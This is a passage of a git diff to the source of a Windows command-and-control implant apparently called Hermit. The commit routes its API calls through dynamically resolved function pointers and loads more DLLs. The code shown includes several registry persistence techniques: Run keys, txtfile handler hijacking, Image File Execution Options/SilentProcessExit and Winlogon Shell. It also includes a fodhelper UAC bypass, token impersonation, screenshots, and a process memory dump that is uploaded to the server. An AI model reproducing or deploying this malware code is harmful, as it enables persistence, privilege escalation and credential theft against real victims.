(wcslen(wSelfPath) + 1) * sizeof(WCHAR) ) != ERROR_SUCCESS) { - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Error: Failed to set value to registry."; } - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Success: The entry has been set to HKCU\\" + wSubKey + L"."; } else if (wcscmp(wTechnique.c_str(), L"default-file-extension-hijacking") == 0) @@ -155,7 +155,7 @@ namespace Task HKEY hKey; std::wstring wSubKey = L"txtfile\\shell\\open\\command"; - LONG result = RegOpenKeyExW( + LONG result = pState->pProcs->lpRegOpenKeyExW( HKEY_CLASSES_ROOT, wSubKey.c_str(), 0, @@ -167,7 +167,7 @@ namespace Task return L"Error: Failed to open key."; } - result = RegSetValueExW( + result = pState->pProcs->lpRegSetValueExW( hKey, L"", 0, @@ -175,7 +175,7 @@ namespace Task (BYTE*)lpSelfPath, (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) ); - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); if (result == ERROR_SUCCESS) { @@ -197,7 +197,7 @@ namespace Task const WCHAR* wSilent = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"; // GlobalFlag - if (RegCreateKeyExW( + if (pState->pProcs->lpRegCreateKeyExW( HKEY_LOCAL_MACHINE, wImg, 0, @@ -212,7 +212,7 @@ namespace Task return L"Error: Failed to create key: Image File Execution Options\\notepad.exe."; } - if (RegSetValueExW( + if (pState->pProcs->lpRegSetValueExW( hKey, L"GlobalFlag", 0, @@ -221,12 +221,12 @@ namespace Task sizeof(dwGF) ) != ERROR_SUCCESS) { - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Error: Failed to set key."; } - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); - if (RegCreateKeyExW( + if (pState->pProcs->lpRegCreateKeyExW( HKEY_LOCAL_MACHINE, wSilent, 0, @@ -238,11 +238,11 @@ namespace Task nullptr ) != ERROR_SUCCESS) { - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Error: Failed to create key: SilentProcessExit\\notepad.exe."; } - if (RegSetValueExW( + if (pState->pProcs->lpRegSetValueExW( hKey, L"ReportingMode", 0, @@ -251,10 +251,10 @@ namespace Task sizeof(dwRM) ) != ERROR_SUCCESS) { - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Error: Failed to set ReportingMode."; } - if (RegSetValueExW( + if (pState->pProcs->lpRegSetValueExW( hKey, L"MonitorProcess", 0, @@ -263,11 +263,11 @@ namespace Task (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) ) != ERROR_SUCCESS) { - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Error: Failed to set MonitorProcess."; } - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Success: The entry has been set to HKLM\\" + std::wstring(wImg) + L" and HKLM\\" + std::wstring(wSilent) + L"."; } else if (wcscmp(wTechnique.c_str(), L"scheduled-task") == 0) @@ -280,7 +280,7 @@ namespace Task std::wstring wSubKey = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"; std::wstring wValue = Utils::Random::RandomString(8); - LONG result = RegOpenKeyExW( + LONG result = pState->pProcs->lpRegOpenKeyExW( HKEY_LOCAL_MACHINE, wSubKey.c_str(), 0, @@ -295,7 +295,7 @@ namespace Task std::wstring wExecutables = L"explorer.exe," + std::wstring(wSelfPath); LPCWSTR lpExecutables = wExecutables.c_str(); - result = RegSetValueExW( + result = pState->pProcs->lpRegSetValueExW( hKey, L"Shell", 0, @@ -303,7 +303,7 @@ namespace Task (BYTE*)lpExecutables, (wcslen(lpExecutables) + 1) * sizeof(WCHAR) ); - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); if (result == ERROR_SUCCESS) { diff --git a/payload/win/implant/src/core/task/procdump.cpp b/payload/win/implant/src/core/task/procdump.cpp index a4bbf94..0f9e5fb 100644 --- a/payload/win/implant/src/core/task/procdump.cpp +++ b/payload/win/implant/src/core/task/procdump.cpp @@ -8,8 +8,8 @@ namespace Task DWORD dwPid = Utils::Convert::WstringToDWORD(wPid, 10); // std::wstring wDumpFilePath = L"tmp.dmp"; std::wstring wDumpFilePath = System::Env::EnvStringsGet(pState->pProcs, L"%TEMP%") + L"\\tmp.dmp"; - - HANDLE hFile = CreateFile( + + HANDLE hFile = pState->pProcs->lpCreateFileW( wDumpFilePath.c_str(), GENERIC_ALL, 0, @@ -23,14 +23,15 @@ namespace Task return L"Error: Could not create a file to dump."; } - HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwPid); + HANDLE hProcess = pState->pProcs->lpOpenProcess(PROCESS_ALL_ACCESS, 0, dwPid); if (!hProcess) { - CloseHandle(hFile); + pState->pProcs->lpCloseHandle(hFile); return L"Error: Could not open process."; } // Dump + // if (!pState->pProcs->lpMiniDumpWriteDump( if (!MiniDumpWriteDump( hProcess, dwPid, @@ -40,13 +41,13 @@ namespace Task NULL, NULL )) { - CloseHandle(hFile); - CloseHandle(hProcess); + pState->pProcs->lpCloseHandle(hFile); + pState->pProcs->lpCloseHandle(hProcess); return L"Error: Failed to dump the process memory."; } - CloseHandle(hFile); - CloseHandle(hProcess); + pState->pProcs->lpCloseHandle(hFile); + pState->pProcs->lpCloseHandle(hProcess); // Upload a dumped file. std::wstring wHeaders = L""; @@ -65,12 +66,16 @@ namespace Task wHeaders.c_str(), wDumpFilePath )) { - DeleteFile(wDumpFilePath.c_str()); + pState->pProcs->lpDeleteFileW(wDumpFilePath.c_str()); return L"Error: Could not upload the dump file."; } + MessageBoxA(NULL, "FileUpload OK", "Procdump", MB_OK); + // Delete temp dump file - DeleteFile(wDumpFilePath.c_str()); + pState->pProcs->lpDeleteFileW(wDumpFilePath.c_str()); + + MessageBoxA(NULL, "lpDleteFile OK", "Procdump", MB_OK); return wDumpFilePath.c_str(); } diff --git a/payload/win/implant/src/core/task/reg.cpp b/payload/win/implant/src/core/task/reg.cpp index b3a7567..1920f12 100644 --- a/payload/win/implant/src/core/task/reg.cpp +++ b/payload/win/implant/src/core/task/reg.cpp @@ -33,7 +33,7 @@ namespace Task { result += wRootKey + L"\\" + weSubKey + L"\n"; - lStatus = RegOpenKeyExW( + lStatus = pState->pProcs->lpRegOpenKeyExW( hRootKey, weSubKey.c_str(), 0, @@ -53,7 +53,7 @@ namespace Task DWORD dwType; do { - lStatus = RegEnumValueW( + lStatus = pState->pProcs->lpRegEnumValueW( hKey, dwIndex, valueName, @@ -98,7 +98,7 @@ namespace Task dwIndex++; } while (1); - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); } if (result == L"") @@ -106,7 +106,7 @@ namespace Task result = L"Key values not found."; } - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return result; } diff --git a/payload/win/implant/src/core/task/rmdir.cpp b/payload/win/implant/src/core/task/rmdir.cpp index 3ff62c1..2797b98 100644 --- a/payload/win/implant/src/core/task/rmdir.cpp +++ b/payload/win/implant/src/core/task/rmdir.cpp @@ -2,10 +2,10 @@ namespace Task { - std::wstring Rmdir(const std::wstring& wDir) + std::wstring Rmdir(State::PSTATE pState, const std::wstring& wDir) { // Maybe there isn't NTAPI to delete a directory...? - if (!RemoveDirectoryW(wDir.c_str())) + if (!pState->pProcs->lpRemoveDirectoryW(wDir.c_str())) { return L"Error: Could not delete a directory."; } diff --git a/payload/win/implant/src/core/task/runas.cpp b/payload/win/implant/src/core/task/runas.cpp index c6f84db..1d243ed 100644 --- a/payload/win/implant/src/core/task/runas.cpp +++ b/payload/win/implant/src/core/task/runas.cpp @@ -15,7 +15,7 @@ namespace Task si.cb = sizeof(si); // 'RtlCreateUserProcess' might be used instead - if (!CreateProcessWithLogonW( + if (!pState->pProcs->lpCreateProcessWithLogonW( wUser.c_str(), NULL, wPassword.c_str(), diff --git a/payload/win/implant/src/core/task/screenshot.cpp b/payload/win/implant/src/core/task/screenshot.cpp index f0f3345..136e737 100644 --- a/payload/win/implant/src/core/task/screenshot.cpp +++ b/payload/win/implant/src/core/task/screenshot.cpp @@ -9,19 +9,19 @@ std::wstring wFilenamePng; namespace Task::Helper::Screenshot { - BOOL InitInstance(HINSTANCE hInstance, INT nCmdShow) + BOOL InitInstance(Procs::PPROCS pProcs, HINSTANCE hInstance, INT nCmdShow) { hInst = hInstance; - HWND hWnd = CreateWindowExW( + HWND hWnd = pProcs->lpCreateWindowExW( WS_EX_TRANSPARENT, // WS_EX_TOPMOST | WS_EX_TRANSPARENT | WS_EX_LAYERED, wWindowClassName.c_str(), L"Sample", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, - GetSystemMetrics(SM_CXFULLSCREEN), // GetSystemMetrics(SM_CXSCREEN), - GetSystemMetrics(SM_CYFULLSCREEN), // GetSystemMetrics(SM_CYSCREEN), + pProcs->lpGetSystemMetrics(SM_CXFULLSCREEN), // GetSystemMetrics(SM_CXSCREEN), + pProcs->lpGetSystemMetrics(SM_CYFULLSCREEN), // GetSystemMetrics(SM_CYSCREEN), (HWND)NULL, (HMENU)NULL, hInstance, @@ -33,8 +33,8 @@ namespace Task::Helper::Screenshot return FALSE; } - ShowWindow(hWnd, nCmdShow); - UpdateWindow(hWnd); + pProcs->lpShowWindow(hWnd, nCmdShow); + pProcs->lpUpdateWindow(hWnd); return TRUE; } @@ -154,7 +154,6 @@ namespace Task::Helper::Screenshot SRCCOPY ) ) { - MessageBox(hWnd, L"StretchBlt has failed", L"Failed", MB_OK); goto done; } @@ -167,7 +166,6 @@ namespace Task::Helper::Screenshot if (!hbmScreen) { - MessageBox(hWnd, L"CreateCompatibleBitmap Failed", L"Failed", MB_OK); goto done; } @@ -186,7 +184,6 @@ namespace Task::Helper::Screenshot 0, SRCCOPY )) { - MessageBox(hWnd, L"BitBlt has failed", L"Failed", MB_OK); goto done; } @@ -311,7 +308,7 @@ namespace Task::Helper::Screenshot return 0; } - ATOM MyRegisterClass(HINSTANCE hInstance) + ATOM MyRegisterClass(Procs::PPROCS pProcs, HINSTANCE hInstance) { WNDCLASSEXW wcex; wcex.cbSize = sizeof(WNDCLASSEX); @@ -320,14 +317,14 @@ namespace Task::Helper::Screenshot wcex.cbClsExtra = 0; wcex.cbWndExtra = 0; wcex.hInstance = hInstance; - wcex.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(IDI_GDICAPTURINGANIMAGE)); - wcex.hCursor = LoadCursor(nullptr, IDC_ARROW); + wcex.hIcon = pProcs->lpLoadIconW(hInstance, MAKEINTRESOURCE(IDI_GDICAPTURINGANIMAGE)); + wcex.hCursor = pProcs->lpLoadCursorW(nullptr, IDC_ARROW); wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1); wcex.lpszMenuName = MAKEINTRESOURCEW(IDC_GDICAPTURINGANIMAGE); wcex.lpszClassName = wWindowClassName.c_str(); - wcex.hIconSm = LoadIcon(wcex.hInstance, MAKEINTRESOURCE(IDI_SMALL)); + wcex.hIconSm = pProcs->lpLoadIconW(wcex.hInstance, MAKEINTRESOURCE(IDI_SMALL)); - return RegisterClassExW(&wcex); + return pProcs->lpRegisterClassExW(&wcex); } } @@ -338,22 +335,27 @@ namespace Task wFilenameBmp = System::Env::EnvStringsGet(pState->pProcs, L"%TEMP%") + L"\\tmp.bmp"; wFilenamePng = System::Env::EnvStringsGet(pState->pProcs, L"%TEMP%") + L"\\tmp.png"; - Task::Helper::Screenshot::MyRegisterClass(pState->hInstance); + Task::Helper::Screenshot::MyRegisterClass(pState->pProcs, pState->hInstance); // Perform application initialization: - if (!Task::Helper::Screenshot::InitInstance(pState->hInstance, pState->nCmdShow)) + if (!Task::Helper::Screenshot::InitInstance(pState->pProcs, pState->hInstance, pState->nCmdShow)) { return L"Error: Could not initialize."; } - HACCEL hAccelTable = LoadAccelerators(pState->hInstance, MAKEINTRESOURCE(IDC_GDICAPTURINGANIMAGE)); + HACCEL hAccelTable = pState->pProcs->lpLoadAcceleratorsW( + pState->hInstance, + MAKEINTRESOURCE(IDC_GDICAPTURINGANIMAGE) + ); MSG msg; + // while (pState->pProcs->lpGetMessage(&msg, nullptr, 0, 0)) // This function cannot be loaded... while (GetMessage(&msg, nullptr, 0, 0)) { - if (!TranslateAccelerator(msg.hwnd, hAccelTable, &msg)) + if (!pState->pProcs->lpTranslateAcceleratorW(msg.hwnd, hAccelTable, &msg)) { - TranslateMessage(&msg); + pState->pProcs->lpTranslateMessage(&msg); + // pState->pProcs->lpDispatchMessage(&msg); // this function cannot be loaded... DispatchMessage(&msg); } } diff --git a/payload/win/implant/src/core/task/token.cpp b/payload/win/implant/src/core/task/token.cpp index a9a5f34..94f1d05 100644 --- a/payload/win/implant/src/core/task/token.cpp +++ b/payload/win/implant/src/core/task/token.cpp @@ -13,7 +13,7 @@ namespace Task::Helper::Token RtlZeroMemory(&pi, sizeof(PROCESS_INFORMATION)); si.cb = sizeof(STARTUPINFOW); - bResults = DuplicateTokenEx( + bResults = pProcs->lpDuplicateTokenEx( hToken, MAXIMUM_ALLOWED, NULL, @@ -26,7 +26,7 @@ namespace Task::Helper::Token return FALSE; } - bResults = CreateProcessWithTokenW( + bResults = pProcs->lpCreateProcessWithTokenW( hDuplToken, LOGON_WITH_PROFILE, appName, @@ -48,9 +48,9 @@ namespace Task::Helper::Token namespace Task { - std::wstring TokenRevert() + std::wstring TokenRevert(State::PSTATE pState) { - if (!RevertToSelf()) + if (!pState->pProcs->lpRevertToSelf()) { return L"Error: Could not revert impersonation."; } @@ -69,7 +69,7 @@ namespace Task DWORD dwPid = Utils::Convert::WstringToDWORD(wPid, 10); // Current user needs to have SeDebugPrivilege. - if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hCurrToken)) + if (!pState->pProcs->lpOpenProcessToken(NtCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hCurrToken)) { return L"Error: Could not open the process token."; } @@ -82,21 +82,21 @@ namespace Task } // Open target process token handle. - HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, TRUE, dwPid); + HANDLE hProcess = pState->pProcs->lpOpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, TRUE, dwPid); if (!hProcess) { return L"Error: Failed to get target process handle."; } HANDLE hToken = NULL; - if (!OpenProcessToken(hProcess, MAXIMUM_ALLOWED, &hToken)) + if (!pState->pProcs->lpOpenProcessToken(hProcess, MAXIMUM_ALLOWED, &hToken)) { return L"Error: Failed to get target process token handle."; } if (bLogin) { - if (!ImpersonateLoggedOnUser(hToken)) + if (!pState->pProcs->lpImpersonateLoggedOnUser(hToken)) { return L"Error: Could not logon with impersonation."; } @@ -114,7 +114,7 @@ namespace Task // Get current program (implant) path. WCHAR wSelfPath[MAX_PATH]; - DWORD dwResult = GetModuleFileNameW(NULL, wSelfPath, MAX_PATH); + DWORD dwResult = pState->pProcs->lpGetModuleFileNameW(NULL, wSelfPath, MAX_PATH); if (dwResult == 0) { return L"Error: Failed to get the program path."; diff --git a/payload/win/implant/src/core/task/uac.cpp b/payload/win/implant/src/core/task/uac.cpp index b5bf73e..4554b24 100644 --- a/payload/win/implant/src/core/task/uac.cpp +++ b/payload/win/implant/src/core/task/uac.cpp @@ -6,7 +6,7 @@ namespace Task { // Get current program (implant) path. WCHAR wSelfPath[MAX_PATH]; - DWORD dwResult = GetModuleFileNameW(NULL, wSelfPath, MAX_PATH); + DWORD dwResult = pState->pProcs->lpGetModuleFileNameW(NULL, wSelfPath, MAX_PATH); if (dwResult == 0) { return L"Error: Failed to get the program path."; @@ -24,7 +24,7 @@ namespace Task LPCWSTR lpCmd = wCmd.c_str(); const WCHAR* wDel = L""; - if (RegCreateKeyExW( + if (pState->pProcs->lpRegCreateKeyExW( HKEY_CURRENT_USER, wSubKey.c_str(), 0, @@ -39,7 +39,7 @@ namespace Task return L"Error: Failed to create key: Image File Execution Options\\notepad.exe."; } - if (RegSetValueExW( + if (pState->pProcs->lpRegSetValueExW( hKey, L"", 0, @@ -48,11 +48,11 @@ namespace Task (wcslen(lpCmd) + 1) * sizeof(WCHAR) ) != ERROR_SUCCESS) { - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Error: Failed to set default value for ms-settings command."; } - if (RegSetValueExW( + if (pState->pProcs->lpRegSetValueExW( hKey, L"DelegateExecute", 0, @@ -61,11 +61,11 @@ namespace Task (wcslen(wDel) + 1) * sizeof(WCHAR) ) != ERROR_SUCCESS) { - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); return L"Error: Failed to set 'DelegateExecute' value for ms-settings command."; } - RegCloseKey(hKey); + pState->pProcs->lpRegCloseKey(hKey); // Start the fodhelper.exe SHELLEXECUTEINFO sei = {sizeof(sei)}; @@ -74,7 +74,7 @@ namespace Task sei.hwnd = nullptr; sei.nShow = SW_NORMAL; - if (!ShellExecuteEx(&sei)) + if (!pState->pProcs->lpShellExecuteExW(&sei)) { return L"Error: Failed to execute shell."; } diff --git a/payload/win/implant/src/core/task/whoami.cpp b/payload/win/implant/src/core/task/whoami.cpp index 63bb820..201ad05 100644 --- a/payload/win/implant/src/core/task/whoami.cpp +++ b/payload/win/implant/src/core/task/whoami.cpp @@ -25,7 +25,7 @@ namespace Task // Get access token of current process. HANDLE hToken; - if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) + if (!pState->pProcs->lpOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &hToken)) { return L"Error: Failed to open process token."; } @@ -34,18 +34,18 @@ namespace Task DWORD dwSize = 0; // Determines the received data length. - if (!GetTokenInformation(hToken, TokenPrivileges, NULL, dwSize, &dwSize)) + if (!pState->pProcs->lpGetTokenInformation(hToken, TokenPrivileges, NULL, dwSize, &dwSize)) { - if (GetLastError() != ERROR_INSUFFICIENT_BUFFER) + if (pState->pProcs->lpGetLastError() != ERROR_INSUFFICIENT_BUFFER) { return L"Error: Failed to get token information."; } } - pPrivileges = (PTOKEN_PRIVILEGES) GlobalAlloc(GPTR, dwSize); + pPrivileges = (PTOKEN_PRIVILEGES) pState->pProcs->lpGlobalAlloc(GPTR, dwSize); // Finally get the token information. - if (!GetTokenInformation(hToken, TokenPrivileges, pPrivileges, dwSize, &dwSize)) + if (!pState->pProcs->lpGetTokenInformation(hToken, TokenPrivileges, pPrivileges, dwSize, &dwSize)) { return L"Error: Failed to get token information."; } @@ -62,7 +62,7 @@ namespace Task LUID luid = pPrivileges->Privileges[i].Luid; dwPrivNameLen = sizeof(privName); - if (!LookupPrivilegeName(NULL, &luid, privName, &dwPrivNameLen)) + if (!pState->pProcs->lpLookupPrivilegeNameW(NULL, &luid, privName, &dwPrivNameLen)) { return L"Error: Failed to lookup privilege name."; break; @@ -82,7 +82,7 @@ namespace Task if (pPrivileges) { - GlobalFree(pPrivileges); + pState->pProcs->lpGlobalFree(pPrivileges); } return result; diff --git a/payload/win/implant/src/hermit.cpp b/payload/win/implant/src/hermit.cpp index 59e924a..aae279c 100644 --- a/payload/win/implant/src/hermit.cpp +++ b/payload/win/implant/src/hermit.cpp @@ -80,6 +80,22 @@ namespace Hermit } pState->hCrypt32DLL = hCrypt32; + WCHAR wDbghelpDLL[] = L"dbghelp.dll"; + HMODULE hDbghelp = (HMODULE)Procs::LoadModule(pState->pProcs, (LPWSTR)wDbghelpDLL); + if (!hDbghelp) + { + return; + } + pState->hDbghelpDLL = hDbghelp; + + WCHAR wIphlpapiDLL[] = L"iphlpapi.dll"; + HMODULE hIphlpapi = (HMODULE)Procs::LoadModule(pState->pProcs, (LPWSTR)wIphlpapiDLL); + if (!hIphlpapi) + { + return; + } + pState->hIphlpapiDLL = hIphlpapi; + WCHAR wNetapi32DLL[] = L"netapi32.dll"; HMODULE hNetapi32 = (HMODULE)Procs::LoadModule(pState->pProcs, (LPWSTR)wNetapi32DLL); if (!hNetapi32) @@ -88,6 +104,22 @@ namespace Hermit } pState->hNetapi32DLL = hNetapi32; + WCHAR wShell32DLL[] = L"shell32.dll"; + HMODULE hShell32 = (HMODULE)Procs::LoadModule(pState->pProcs, (LPWSTR)wShell32DLL); + if (!hShell32) + { + return; + } + pState->hShell32DLL = hShell32; + + WCHAR wUser32DLL[] = L"user32.dll"; + HMODULE hUser32 = (HMODULE)Procs::LoadModule(pState->pProcs, (LPWSTR)wUser32DLL); + if (!hUser32) + { + return; + } + pState->hUser32DLL = hUser32; + WCHAR wWinHttpDll[] = L"winhttp.dll"; HMODULE hWinHttp = (HMODULE)Procs::LoadModule(pState->pProcs, (LPWSTR)wWinHttpDll); if (!hWinHttp) @@ -102,7 +134,11 @@ namespace Hermit hAdvapi32, hBcrypt, hCrypt32, + hDbghelp, + hIphlpapi, hNetapi32, + hShell32, + hUser32, hWinHttp );